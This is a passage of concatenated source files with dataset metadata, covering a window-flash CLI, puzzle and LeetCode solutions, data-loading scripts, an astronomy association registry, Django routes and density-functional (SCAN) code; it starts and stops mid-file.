port=5000)","sub_path":"FACIALRECOGNITION/FrWebService.py","file_name":"FrWebService.py","file_ext":"py","file_size_in_byte":5487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"473172475","text":"\"\"\"flashfocus command line interface.\"\"\"\nimport logging\nfrom logging import info as log\nimport os\n\nimport click\nfrom tendo import singleton\n\nfrom flashfocus.flasher import Flasher\n\n# Set LOGLEVEL 
environment variable to DEBUG or WARNING to change logging\n# verbosity.\nlogging.basicConfig(level=os.environ.get('LOGLEVEL', 'INFO'))\n\n\ndef validate_positive_decimal(ctx, param, value):\n \"\"\"Validate the opacity command line argument.\"\"\"\n if not 0 <= value <= 1:\n raise ValueError(\n \"%s parameter not in valid range, should be between 0 and 1\", param)\n return value\n\n\ndef format_time(ctx, param, value):\n \"\"\"Validate the time command line argument and convert to seconds.\"\"\"\n validate_positive_int(ctx, param, value)\n return value / 1000\n\n\ndef validate_positive_int(ctx, param, value):\n \"\"\"Check that a command line argument is a positive integer.\"\"\"\n if value < 1:\n raise ValueError(\"%s parameter cannot be < 1\", param)\n if int(value) != value:\n raise ValueError(\"%s parameter must be an int, not a float\", param)\n return value\n\n\n@click.command()\n@click.option('--opacity', '-o',\n default=0.8,\n callback=validate_positive_decimal,\n help='Opacity of the window during a flash.')\n@click.option('--time', '-t',\n default=500,\n callback=format_time,\n help='Flash time interval (in milliseconds).')\n@click.option('--simple', '-s', is_flag=True,\n help='Don\\'t animate flashes. Setting this parameter improves '\n 'performance but causes rougher opacity transitions.')\n@click.option('--ntimepoints', '-n',\n default=10,\n callback=validate_positive_int,\n help='Number of timepoints in the flash animation. Higher values '\n 'will lead to smoother animations with the cost of '\n 'increased X server requests. Ignored if --simple is set.')\n@click.option('--debug', '-d', is_flag=True, help='Run in debug mode.')\ndef cli(opacity, time, ntimepoints, simple, debug):\n \"\"\"Simple focus animations for tiling window managers.\"\"\"\n params = locals()\n single_instance_lock = singleton.SingleInstance()\n log('Initializing with parameters:')\n log('%s', params)\n flasher = Flasher(opacity, time, ntimepoints, simple)\n if debug:\n log('Flasher attributes: %s', flasher.__dict__)\n else:\n flasher.monitor_focus()\n","sub_path":"flashfocus/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"230216088","text":"class Status:\r\n\tdef __init__(self):\r\n\t\tself.x = True\r\n\t\tself.o = True\r\n\t\r\n\tdef check(self, c):\r\n\t\tif c == '.':\r\n\t\t\tself.o = False\r\n\t\t\tself.x = False\r\n\t\telif c == 'X':\r\n\t\t\tself.o = False\r\n\t\telif c == 'O':\r\n\t\t\tself.x = False\r\n\r\ndef solve_game(inp, out):\r\n\tboard = list()\r\n\tfor i in range(4):\r\n\t\tboard.append(inp.readline())\r\n\tincomplete = False\r\n\tfor i in range(4):\r\n\t\tr = Status()\r\n\t\tc = Status()\r\n\t\tfor j in range(4):\r\n\t\t\tif board[i][j] == '.':\r\n\t\t\t\tincomplete = True\r\n\t\t\tr.check(board[i][j])\r\n\t\t\tc.check(board[j][i])\r\n\t\tif r.x or c.x:\r\n\t\t\treturn \"X won\"\r\n\t\tif r.o or c.o:\r\n\t\t\treturn \"O won\"\r\n\td1 = Status()\r\n\td2 = Status()\r\n\tfor i in range(4):\r\n\t\td1.check(board[i][i])\r\n\t\td2.check(board[i][3-i])\r\n\tif d1.x or d2.x:\r\n\t\treturn \"X won\"\r\n\tif d1.o or d2.o:\r\n\t\treturn \"O won\"\r\n\tif incomplete:\r\n\t\treturn \"Game has not completed\"\r\n\telse:\r\n\t\treturn \"Draw\"\r\n\r\ndef solve(inp, out):\r\n\tn = int(inp.readline())\r\n\tfor i in xrange(1,n+1):\r\n\t\tst = solve_game(inp, out)\r\n\t\tout.write(\"Case #%d: %s\\n\" % (i, st))\r\n\t\tinp.readline()\r\n\r\ndef main():\r\n\twith open(\"A-large.in\", 
\"rt\") as inp:\r\n\t\twith open(\"output.txt\", \"wt\") as out:\r\n\t\t\tsolve(inp, out)\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","sub_path":"solutions_2453486_1/Python/infsega/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"314456298","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nimport Model\r\nimport pywt\r\ndef read_data(filename):\r\n data = pd.read_csv(filename, header=None)\r\n X = data.values\r\n X = X.reshape([len(X)*5, 1])\r\n scaler = MinMaxScaler()\r\n X = scaler.fit_transform(X)\r\n return X\r\ndef read_label(filename):\r\n label = pd.read_csv(filename, header = None)\r\n y = label.values\r\n return y\r\ndef get_data(bit_rate, distance):\r\n i = 1\r\n X = []\r\n y = []\r\n num_file = 40\r\n while i < (num_file+1):\r\n X_path = 'Lorentz_dataset/%scm/%sk/%s000_250_%s.csv' % (distance, bit_rate, bit_rate, i)\r\n y_path = 'Lorentz_dataset/%scm/%sk/label_%s000_250_%s.csv' % (distance, bit_rate, bit_rate, i)\r\n X_t = read_data(X_path)\r\n y_t = read_label(y_path)\r\n X = np.append(X, X_t)\r\n y = np.append(y, y_t)\r\n i+=1\r\n X = X.reshape(num_file*250, 5)\r\n y = y.reshape(-1)\r\n return X, y\r\ndef get_data_related_bit(bit_rate, distance):\r\n j = 1\r\n X = []\r\n y = []\r\n num_file = 40\r\n while j < (num_file+1):\r\n data_path = 'Lorentz_dataset/%scm/%sk/%s000_250_%s.csv' % (distance, bit_rate, bit_rate, j)\r\n y_path = 'Lorentz_dataset/%scm/%sk/label_%s000_250_%s.csv' % (distance, bit_rate, bit_rate, j)\r\n data_t = read_data(data_path)\r\n y_t = read_label(y_path)\r\n data_t = data_t.reshape([250, 5])\r\n y_t = y_t.reshape(-1)\r\n data = []\r\n for i in np.arange(len(data_t)):\r\n if i == 0:\r\n temp_1 = data_t[len(data_t)-2]\r\n temp_2 = data_t[len(data_t)-1]\r\n temp_3 = data_t[i]\r\n temp_4 = data_t[i+1]\r\n temp_5 = data_t[i+2]\r\n temp_6 = np.hstack([temp_1, temp_2, temp_3, temp_4, temp_5])\r\n elif i == 1:\r\n temp_1 = data_t[len(data_t)-1]\r\n temp_2 = data_t[len(data_t)-1]\r\n temp_3 = data_t[i]\r\n temp_4 = data_t[i+1]\r\n temp_5 = data_t[i+2]\r\n temp_6 = np.hstack([temp_1, temp_2, temp_3, temp_4, temp_5])\r\n elif i == len(data_t)-2:\r\n temp_1 = data_t[i-2]\r\n temp_2 = data_t[i-1]\r\n temp_3 = data_t[i]\r\n temp_4 = data_t[i+1]\r\n temp_5 = data_t[0]\r\n temp_6 = np.hstack([temp_1, temp_2, temp_3, temp_4, temp_5])\r\n elif i == len(data_t)-1:\r\n temp_1 = data_t[i-2]\r\n temp_2 = data_t[i-1]\r\n temp_3 = data_t[i]\r\n temp_4 = data_t[0]\r\n temp_5 = data_t[1]\r\n temp_6 = np.hstack([temp_1, temp_2, temp_3, temp_4, temp_5])\r\n else:\r\n temp_1 = data_t[i-2]\r\n temp_2 = data_t[i-1]\r\n temp_3 = data_t[i]\r\n temp_4 = data_t[i+1]\r\n temp_5 = data_t[i+2]\r\n temp_6 = np.hstack([temp_1, temp_2, temp_3, temp_4, temp_5])\r\n data = np.append(data, temp_6)\r\n X = np.append(X, data)\r\n y = np.append(y, y_t)\r\n j+=1\r\n X = X.reshape(num_file*250, 25)\r\n return X, y\r\ndef CWT(X):\r\n cwt = []\r\n for i in X:\r\n coef, freqs = pywt.cwt(i, np.arange(1, 4), 'mexh')\r\n cwt = np.append(cwt, coef)\r\n cwt = cwt.reshape(10000, X.shape[0]*3)\r\n return cwt\r\ndef exe(mode, bit_rate, distance):\r\n if mode == \"related_bit\":\r\n X, y = get_data_related_bit(bit_rate, distance)\r\n elif mode == \"DAE\":\r\n X, y = get_data(bit_rate, distance)\r\n m = Model.DAE(bit_rate, X, y)\r\n X = m.correct()\r\n else:\r\n X, y = get_data(bit_rate, 
distance)\r\n filename_1 = \"Lorentz_dataset/Lorentz_%scm_%sk_related_bit.csv\" % (distance, bit_rate)\r\n filename_2 = \"Lorentz_dataset/Lorentz_label_%scm_%sk.csv\" % (distance, bit_rate)\r\n np.savetxt(filename_1, X, delimiter=\",\")\r\n np.savetxt(filename_2, y, delimiter=\",\")\r\n return X, y","sub_path":"Getdata.py","file_name":"Getdata.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"569741930","text":"import logging\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom inspect import getfile, getmembers, isclass, ismodule\nfrom itertools import count\nimport json\nimport jsonschema\nfrom nose.tools import nottest\nfrom os.path import abspath, basename, dirname, expanduser, expandvars, join\nimport re\nimport sys\n\nfrom astropy.extern import six\nfrom numpy.ma import masked\n\n# Configure logging\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n# Library files\n_ASN_RULE = 'association_rules.py'\n\n# User-level association definitions start with...\nUSER_ASN = 'Asn_'\n\n# Timestamp template\n_TIMESTAMP_TEMPLATE = '%Y%m%dT%H%M%S'\n\n\nclass AssociationError(Exception):\n \"\"\"Basic failure of an association\"\"\"\n\n\nclass AssociationRegistry(dict):\n \"\"\"The available assocations\n\n Parameters\n ----------\n definition_files: [str,]\n The files to find the association definitions in.\n\n include_default: bool\n True to include the default definitions.\n\n global_constraints: dict\n Constraints to be added to each rule.\n \"\"\"\n\n def __init__(self,\n definition_files=None,\n include_default=True,\n global_constraints=None):\n super(AssociationRegistry, self).__init__()\n\n # Setup constraints that are to be applied\n # to every rule.\n if global_constraints is None:\n global_constraints = {}\n\n if definition_files is None:\n definition_files = []\n if include_default:\n definition_files.insert(0, libpath(_ASN_RULE))\n if len(definition_files) <= 0:\n raise AssociationError('No rule definition files specified.')\n Utility = type('Utility', (object,), {})\n for fname in definition_files:\n logger.debug('Import rules files \"{}\"'.format(fname))\n module = import_from_file(fname)\n logger.debug('Module=\"{}\"'.format(module))\n for class_name, class_object in get_classes(module):\n logger.debug('class_name=\"{}\"'.format(class_name))\n if class_name.startswith(USER_ASN):\n class_object.GLOBAL_CONSTRAINTS = global_constraints\n self.__setitem__(class_name, class_object)\n if class_name == 'Utility':\n Utility = type('Utility', (class_object, Utility), {})\n self.Utility = Utility\n\n def match(self, member, timestamp=None, ignore=None):\n \"\"\"See if member belongs to any of the association defined.\n\n Parameters\n ----------\n member: dict\n A member, like from a Pool, to find assocations for.\n\n timestamp: str\n If specified, a string appened to association names.\n Generated if not specified.\n\n ignore: list\n A list of associations to ignore when looking for a match.\n Intended to ensure that already created associations\n are not re-created.\n\n Returns\n -------\n [association,]\n A list of associations this member belongs to.\n \"\"\"\n logger.debug('Starting...')\n associations = []\n for name, rule in self.items():\n if rule not in ignore:\n try:\n associations.append(rule(member, timestamp))\n except AssociationError as error:\n logger.debug('Rule \"{}\" not matched'.format(name))\n 
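# a rule failing to match is routine while probing; log the detail and move on to the next rule\n 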
logger.debug('Error=\"{}\"'.format(error))\n continue\n if len(associations) == 0:\n raise AssociationError('Member does not match any rules.')\n return associations\n\n\nclass Association(object):\n \"\"\"An Association\n\n Parameters\n ----------\n member: dict\n The member to initialize the association with.\n\n timestamp: str\n Timestamp to use in the name of this association. Should conform\n to the datetime.strftime format '%Y%m%dT%M%H%S'. If None, class\n instantiation will create this string using current time.\n\n Raises\n ------\n AssociationError\n If a member doesn't match any of the registered associations.\n\n Attributes\n ----------\n meta: dict\n Information about the association.\n\n data: dict\n The association. The format of this data structure\n is determined by the individual assocations and, if\n defined, valided against their specified schema.\n\n schema_file: str\n The name of the output schema that an association\n must adhere to.\n \"\"\"\n\n # Default force a constraint to use first value.\n DEFAULT_FORCE_UNIQUE = False\n\n # Default require that the constraint exists or otherwise\n # can be explicitly checked.\n DEFAULT_REQUIRE_CONSTRAINT = True\n\n # Global constraints\n GLOBAL_CONSTRAINTS = {}\n\n # Associations of the same type are sequenced.\n _sequence = count(1)\n\n def __init__(self, member, timestamp=None):\n\n self.add_constraints(deepcopy(self.GLOBAL_CONSTRAINTS))\n self.test_and_set_constraints(member)\n\n # Member belongs to us!\n # Continue initialization.\n self.sequence = six.advance_iterator(self._sequence)\n if timestamp is not None:\n self.timestamp = timestamp\n else:\n self.timestamp = make_timestamp()\n self.meta = {}\n self.data = {\n 'asn_type': 'None',\n 'asn_rule': self.__class__.__name__,\n 'creation_time': self.timestamp\n }\n\n # Peform further initializations before actually\n # adding the member to this association.\n self._init_hook(member)\n\n self.add(member, check_constraints=False)\n\n @property\n def asn_name(self):\n return 'unamed_association'\n\n def to_json(self):\n \"\"\"Create JSON representation.\n\n Returns\n -------\n (name, str):\n Tuple where the first item is the suggested\n base name for the JSON file.\n Second item is the string containing the JSON serialization.\n \"\"\"\n\n # Validate\n schema_path = libpath(self.schema_file)\n with open(schema_path, 'r') as schema_file:\n adb_schema = json.load(schema_file)\n jsonschema.validate(self.data, adb_schema)\n\n return (\n self.asn_name,\n json.dumps(self.data, indent=4, separators=(',', ': '))\n )\n\n def add(self, member, check_constraints=True):\n \"\"\"Add the member to the association\n\n Parameters\n ----------\n member: dict\n The member to add.\n\n check_constraints: bool\n If True, see if the member should belong to this association.\n If False, just add it.\n \"\"\"\n if check_constraints:\n self.test_and_set_constraints(member)\n\n self._add(member)\n\n @nottest\n def test_and_set_constraints(self, member):\n \"\"\"Test whether the given dictionaries match parameters for\n for this association\n\n Parameters\n ----------\n member: dict\n The parameters to check/set for this association.\n This can be a list of dictionaries.\n\n Raises\n ------\n AssociationError\n If a match fails.\n\n Notes\n -----\n If a constraint is present, but does not have a value,\n that constraint is set, and, by definition, matches.\n \"\"\"\n for constraint, conditions in self.constraints.items():\n try:\n input, value = getattr_from_list(member, conditions['inputs'])\n except 
KeyError:\n if conditions.get('required', self.DEFAULT_REQUIRE_CONSTRAINT):\n raise AssociationError(\n 'Constraint {} not present in member.'.format(constraint)\n )\n else:\n conditions['value'] = 'Constraint not present and ignored'\n continue\n if conditions['value'] is not None:\n if not meets_conditions(\n value, conditions['value']\n ):\n raise AssociationError(\n 'Constraint {} does not match association.'.format(constraint)\n )\n if conditions['value'] is None or \\\n conditions.get('force_unique', self.DEFAULT_FORCE_UNIQUE):\n logger.debug('Input=\"{}\" Value=\"{}\"'.format(input, value))\n conditions['value'] = re.escape(value)\n conditions['input'] = [input]\n conditions['force_unique'] = False\n\n def add_constraints(self, new_constraints):\n \"\"\"Add a set of constraints to the current constraints.\"\"\"\n\n try:\n constraints = self.constraints\n except AttributeError:\n constraints = {}\n self.constraints = constraints\n for constraint, value in six.iteritems(new_constraints):\n constraints[constraint] = constraints.get(constraint, value)\n\n def constraints_to_text(self):\n yield 'Constraints:'\n for c, p in self.constraints.items():\n yield ' {:s}: {}'.format(c, p['value'])\n\n @classmethod\n def reset_sequence(cls):\n cls._sequence = count(1)\n\n def _init_hook(self, member):\n \"\"\"Post-check and pre-member-adding initialization.\"\"\"\n pass\n\n def _add(self, member):\n \"\"\"Add a member, association-specific\"\"\"\n raise NotImplementedError('Association._add must be implemented by a specific assocation rule.')\n\n\n# Utilities\ndef import_from_file(filename):\n path = expandvars(expanduser(filename))\n module_name = basename(path).split('.')[0]\n folder = dirname(path)\n sys.path.insert(0, folder)\n module = __import__(module_name)\n sys.path.pop(0)\n return module\n\n\ndef meets_conditions(value, conditions):\n \"\"\"Check whether value meets any of the provided conditions\n\n Parameters\n ----------\n values: str\n The value to be check with.\n\n condition: regex,\n Regular expressions to match against.\n\n Returns\n -------\n True if any condition is meant.\n \"\"\"\n\n if isinstance(conditions, six.string_types):\n conditions = [conditions]\n for condition in conditions:\n match = re.match(condition, value, flags=re.IGNORECASE)\n if match:\n return True\n return False\n\n\ndef libpath(filepath):\n '''Return the full path to the module library.'''\n\n return join(dirname(abspath(getfile(Association))),\n 'lib',\n filepath)\n\n\ndef make_timestamp():\n timestamp = datetime.utcnow().strftime(\n _TIMESTAMP_TEMPLATE\n )\n return timestamp\n\n\ndef getattr_from_list(adict, attributes):\n \"\"\"Retrieve value from dict using a list of attributes\n\n Parameters\n ----------\n adict: dict\n dict to retrieve from\n\n attributes: list\n List of attributes\n\n Returns\n -------\n (attribute, value)\n Returns the value and the attribute from\n which the value was taken.\n\n Raises\n ------\n KeyError\n None of the attributes are found in the dict.\n \"\"\"\n for attribute in attributes:\n try:\n result = adict[attribute]\n if result is masked:\n raise KeyError\n return attribute, result\n except KeyError:\n continue\n else:\n raise KeyError\n\n\ndef get_classes(module):\n \"\"\"Recursively get all classes in the module\"\"\"\n logger.debug('Called.')\n for class_name, class_object in getmembers(\n module,\n lambda o: isclass(o) or ismodule(o)\n ):\n logger.debug('name=\"{}\" object=\"{}\"'.format(class_name, class_object))\n if ismodule(class_object) and 
class_name.startswith('asn_'):\n for sub_name, sub_class in get_classes(class_object):\n yield sub_name, sub_class\n elif isclass(class_object):\n yield class_name, class_object\n","sub_path":"jwst/associations/association.py","file_name":"association.py","file_ext":"py","file_size_in_byte":12072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"4630154","text":"import pandas as pd\nimport numpy as np\n\nimport time\n\ndef count_values(file, col, nb_lignes):\n start_time = time.time()\n \n print(\"Reading the file...\")\n\n ch_size = 100000\n\n chunks = pd.read_csv(file, iterator=True, chunksize=ch_size, usecols=[col])\n values = pd.read_csv(file, nrows=1, usecols=[col])\n\n current_chunk = 0\n chunk_nb = np.ceil(nb_lignes/ch_size)\n\n print(\"Starting to count the number of distinct values\")\n for chunk in chunks:\n values = values.append(chunk).drop_duplicates(col)\n current_chunk += 1\n print(\"{} %\".format(np.round(current_chunk*100/chunk_nb, 2)))\n\n print(\"Execution time: {} seconds\".format(np.round(time.time()-start_time,2)))\n print(\"Number of values: {}\".format(len(values)))\n return len(values),values\n\n","sub_path":"expedia/script/include/count_items.py","file_name":"count_items.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"68941819","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n\n url(r'^update_medias/(?P<folder>[^/]*)', views.update_medias_folder, name='update_medias_folder'),\n url(r'^update_medias', views.update_medias, name='update_medias'),\n url(r'^update_map/(?P<folder>[^/]*)', views.update_map, name='update_map'),\n url(r'^folders', views.Folders.as_view(), name='get_folders'),\n url(r'^folder/(?P<folder>[^/]*)', views.VideosByFolder.as_view(), name='get_video_by_folder'),\n url(r'', views.index, name='index'),\n]\n","sub_path":"app/front_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"584708129","text":"## Implement strStr()\n\n## Question: what should we return when needle is an empty string?\n# Return 0\n\n\n\n## Method 1: find() checks whether the string contains the substring str; if the beg (start) and end\n# ranges are specified it only searches within them. It returns the starting index when the substring is found, otherwise -1.\n# class Solution:\n# def strStr(self, haystack, needle):\n#\n# return haystack.find(needle)\n\n\n\n## Method 2: brute force\n# Starting from each position of haystack, take a slice of the same length as needle and compare it with needle\nclass Solution:\n def strStr(self, haystack, needle):\n for i in range(len(haystack) - len(needle) + 1):\n if haystack[i: i+len(needle)] == needle:\n return i\n return -1\n\n\n\n\na = Solution()\nprint(a.strStr(\"aaaaa\", \"\"))\n\n","sub_path":"ImplementstrStr_28.py","file_name":"ImplementstrStr_28.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"542202625","text":"import argparse\nimport os\nimport sys\nimport subprocess\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n\ndef run_subprocess(args, cwd=None, capture_stdout=False, shell=False):\n if isinstance(args, str):\n raise ValueError(\"args should be a sequence of strings, not a string\")\n\n return subprocess.run(args, cwd=cwd, shell=shell)\n\ndef run_ort_module_tests(cwd, source_dir):\n args = [sys.executable, os.path.join(source_dir, 'tests/bert_for_sequence_classification.py')]\n run_subprocess(args, cwd)\n\ndef build_wheel(cwd, source_dir):\n args = [sys.executable, 
os.path.join(source_dir, 'setup.py'), 'bdist_wheel']\n run_subprocess(args, cwd)\n\ndef main(): \n source_dir = os.path.realpath(os.path.dirname(__file__))\n cwd = os.path.normpath(os.path.join(source_dir, \"..\"))\n\n build_wheel(source_dir, source_dir)\n\n dist_path = os.path.join(source_dir, 'dist')\n wheel_file = os.listdir(dist_path)[0]\n run_subprocess([sys.executable, \"-m\", \"pip\", \"install\", \"--upgrade\", os.path.join(dist_path, wheel_file)], cwd)\n\n run_ort_module_tests(source_dir, source_dir)\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"82399238","text":"def dataSwipe():\r\n f1 = input(\"Enter First File Name: \")\r\n f2 = input(\"Enter Second File Name: \")\r\n\r\n with open(f1,\"r\") as a:\r\n data_a = a.read()\r\n with open(f2,\"r\") as b:\r\n data_b = b.read()\r\n\r\n with open(f1,\"w\") as a:\r\n a.write(data_b)\r\n with open(f2,\"w\") as b:\r\n b.write(data_a)\r\n\r\ndataSwipe()\r\n ","sub_path":"project98.py","file_name":"project98.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"65301619","text":"class Solution:\n def maxScore(self, points: List[int], k: int) -> int:\n # return self.use_sliding_window(points, k)\n return self.dfs_w_mem(points, k)\n # return self.dfs_search(points, k)\n \n def use_sliding_window(self, points, k):\n total = sum(points[-k:])\n if len(points) <= k:\n return total\n \n res = total\n for i in range(k):\n total = total - points[-k+i] + points[i]\n res = max(res, total)\n \n return res\n\n \n def dfs_w_mem(self, points, k):\n # DOESN\"T WORK! 
TLE\n n = len(points)\n # i: start idx; j: ending idx; val: path value\n dp = [[[-2**30] * k for j in range(n)]for _ in range(n)]\n \n def _traverse(points, i, j, k, dp):\n \n if k == -1:\n return 0\n \n if dp[i][j][k] != -2**30:\n return dp[i][j][k]\n \n left = _traverse(points, i+1, j, k-1, dp) + points[i]\n right = _traverse(points, i, j-1, k-1, dp) + points[j]\n \n dp[i][j][k] = max(left, right)\n return dp[i][j][k]\n\n return _traverse(points, 0, len(points)-1, k-1, dp)\n \n def dfs_search(self, points, k):\n def traverse(points, cur_k, K):\n if not points:\n return 0\n \n if cur_k == K:\n return 0\n \n left, right = 0, 0\n if points:\n left = traverse(points[1:], cur_k + 1, K) + points[0]\n\n if points:\n right = traverse(points[:-1], cur_k + 1, K) + points[-1]\n\n return max(left, right)\n \n return traverse(points, 0, k)\n\n\n","sub_path":"leetcode/lc1423_Maximum_Points_You_Can_Obtain_from_Cards.py","file_name":"lc1423_Maximum_Points_You_Can_Obtain_from_Cards.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"469225128","text":"import numpy as np\nfrom math import pi\n\nDEFAULT_X_PARAMS = dict(\n K1 = 0.065,\n A1 = 4.9479,\n C1X = 0.667,\n C2X= 0.8,\n DX = 1.24,\n CXBX = 1.0,\n MUAK = 10.0/81.0,\n K0 = 0.1740,\n B1X = 0.156632,\n B2X = 0.12083,\n B3X = 0.5,\n B4X = 0.2218,\n AX = -0.7385587663820224058842300326808360\n)\n\nDEFAULT_C_PARAMS = dict(\n C1C = 0.64,\n C2C = 1.5,\n DC = 0.7,\n B1C = 0.0285764,\n B2C = 0.0889,\n B3C = 0.125541,\n KAILD = 0.12802585262625815,\n GAMMA = 0.031090690869654895034940863712730,\n BETA_MB = 0.066724550603149220,\n AFACTOR = 0.1,\n BFACTOR = 0.1778,\n BETA_RS_0 = 0.066725, # Same as BETA_MB?\n C_TILDE = 1.467,\n P_TAU = 4.5,\n F0 = -0.9\n)\n\n\ndef getscan_x(params, d0, d1, g0, g1, t0, t1, only_0=False, only_Fx=False):\n # First spin 0\n rho = 2*d0\n drho = 2*g0\n tauw = drho**2/rho/8.0\n tau_rho = 2*t0\n p = drho**2/(4*(3*pi**2)**(2.0/3.0)*rho**(8.0/3.0))\n tau_unif = 3.0/10.0*(3*pi**2)**(2.0/3.0)*rho**(5.0/3.0)\n alpha = (tau_rho - tauw)/tau_unif\n\n # construct LDA exchange energy density\n exunif_0 = params['AX']*rho**(1.0/3.0)\n exlda_0 = exunif_0*rho\n\n # and enhancement factor\n\n Fx0 = scanFx(params, p, alpha)\n\n Ex_0 = exlda_0*Fx0\n\n if only_0:\n return Ex_0\n\n # Now spin 1\n rho = 2*d1\n drho = 2*g1\n tauw = drho**2/rho/8.0\n tau_rho = 2*t1\n p = drho**2/(4*(3*pi**2)**(2.0/3.0)*rho**(8.0/3.0))\n tau_unif = 3.0/10.0*(3*pi**2)**(2.0/3.0)*rho**(5.0/3.0)\n alpha = (tau_rho - tauw)/tau_unif\n\n # construct LDA exchange energy density\n exunif_1 = params['AX']*rho**(1.0/3.0)\n exlda_1 = exunif_1*rho\n\n # and enhancement factor\n Fx1 = scanFx(params, p, alpha)\n Ex_1 = exlda_1*Fx1\n\n if only_Fx:\n return Fx0, Fx1\n\n return (Ex_0 + Ex_1)/2.0\n\n\ndef scanFx(params, p, alpha):\n p2 = p**2\n oma = 1.0 - alpha\n oma2 = oma**2\n\n # make HX0\n hx0 = 1.0 + params['K0']\n\n # make HX1\n cfb4 = params['MUAK']**2/params['K1'] - 0.112654\n wfac = cfb4*p2*np.exp(-abs(cfb4)*p/params['MUAK'])\n vfac = params['B1X']*p + params['B2X']*oma*np.exp(-params['B3X']*oma2)\n yfac = params['MUAK']*p + wfac + vfac**2\n hx1 = 1.0 + params['K1'] - params['K1']/(1.0 + yfac/params['K1'])\n\n # FA\n FA = np.zeros(alpha.shape)\n FA[alpha < 1.0] = np.exp(-params['C1X']*alpha[alpha < 1.0]/oma[alpha < 1.0])\n FA[alpha > 1.0] = -params['DX']*np.exp(params['C2X']/oma[alpha > 1.0])\n\n # gx\n gx = get_gx(params, p) \n\n # Fx1\n Fx1 = hx1 + FA*(hx0 - hx1)\n\n # Fx\n return 
Fx1*gx\n\ndef get_gx(params, p):\n p14 = p**(1.0/4.0)\n gx = np.ones(p.shape)\n gx[p > 0.0] = 1.0 - np.exp(-params['A1']/p14[p > 0.0])\n return gx\n\ndef getscan_c(params, dT, gT, tT, zeta):\n \"\"\"\n This follows the ugly Fortran of the original optimisation program. Sorry.\n\n Note: g0 and g1 are absolute value of gradients\n \"\"\"\n\n gTT = gT**2\n tauw = gTT/(8*dT)\n\n\n ds_zeta = (np.power(1.0 + zeta, 5.0/3.0) + np.power(1.0 - zeta, 5.0/3.0))/2.0\n dx_zeta = (np.power(1.0 + zeta, 4.0/3.0) + np.power(1.0 - zeta, 4.0/3.0))/2.0\n tau0 = 0.3*np.power(3*pi**2, 2.0/3.0)*np.power(dT, 5.0/3.0)*ds_zeta\n alpha = (tT - tauw)/tau0\n\n # Alpha interpolation Function\n f_alpha = np.zeros(alpha.shape)\n f_alpha[alpha < 1.0] = np.exp(params['C1C']*alpha[alpha < 1.0]/(alpha[alpha < 1.0] - 1.0))\n f_alpha[alpha > 1.0] = -params['DC']*np.exp(-params['C2C']/(alpha[alpha > 1.0] - 1.0))\n\n dthrd = np.exp(np.log(dT)*1.0/3.0)\n rs = (0.75/pi)**(1.0/3.0)/dthrd\n\n s = gT/(2.0*(3.0*pi**2)**(1.0/3.0)*np.power(dT, 4.0/3.0))\n\n eppgga0 = corgga_0(params, rs, s, zeta)\n eppgga1 = corgga_1(params, rs, s, zeta)\n\n epp = eppgga1 + f_alpha*(eppgga0 - eppgga1)\n\n return dT*epp\n\n\ndef corgga_0(params, rs, s, zeta):\n # _0 does not refer to spin in function name\n\n ax_lda = -3.0/(4.0*pi)*(9.0*pi/4.0)**(1.0/3.0)\n\n phi = (np.exp((2.0/3.0)*np.log(1.0 + zeta)) + np.exp((2.0/3.0)*np.log(1.0 - zeta)))/2.0\n afix_T = np.sqrt(pi/4.0)*np.power(9.0*pi/4.0, 1.0/6.0)\n\n sqrt_rs = np.sqrt(rs)\n f1 = 1.0 + params['B2C']*sqrt_rs + params['B3C']*rs\n ec0_lda = -params['B1C']/f1\n\n\n dx_zeta = (np.power(1.0 + zeta, 4.0/3.0) + np.power(1.0 - zeta, 4.0/3.0))/2.0\n gc_zeta = (2**(1.0/3.0) - dx_zeta)/(2**(1.0/3.0) - 1.0) # This is different from published?!\n\n w0 = np.exp(-ec0_lda/params['B1C']) - 1.0\n\n gf_inf = 1.0/(1.0 + 4.0*params['KAILD']*s**2)**(1.0/4.0)\n\n hcore0 = 1.0 + w0*(1.0 - gf_inf)\n h0 = params['B1C']*np.log(hcore0)\n\n EPPGGA = (ec0_lda + h0)*gc_zeta\n\n return EPPGGA\n\n\ndef corgga_1(params, rs, s, zeta):\n\n dthrd = rs/(0.75/pi)**(1.0/3.0)\n phi = (np.power(1.0 + zeta,2.0/3.0) + np.power(1.0 - zeta,2.0/3.0))/2.0\n\n afix_T = np.sqrt(pi/4.0)*np.power(9.0*pi/4.0, 1.0/6.0)\n\n T = afix_T*s/np.sqrt(rs)/phi\n FK = (3.0*pi**2)**(1.0/3.0)*dthrd\n sk = np.sqrt(4.0*FK/pi)\n\n EC, H = 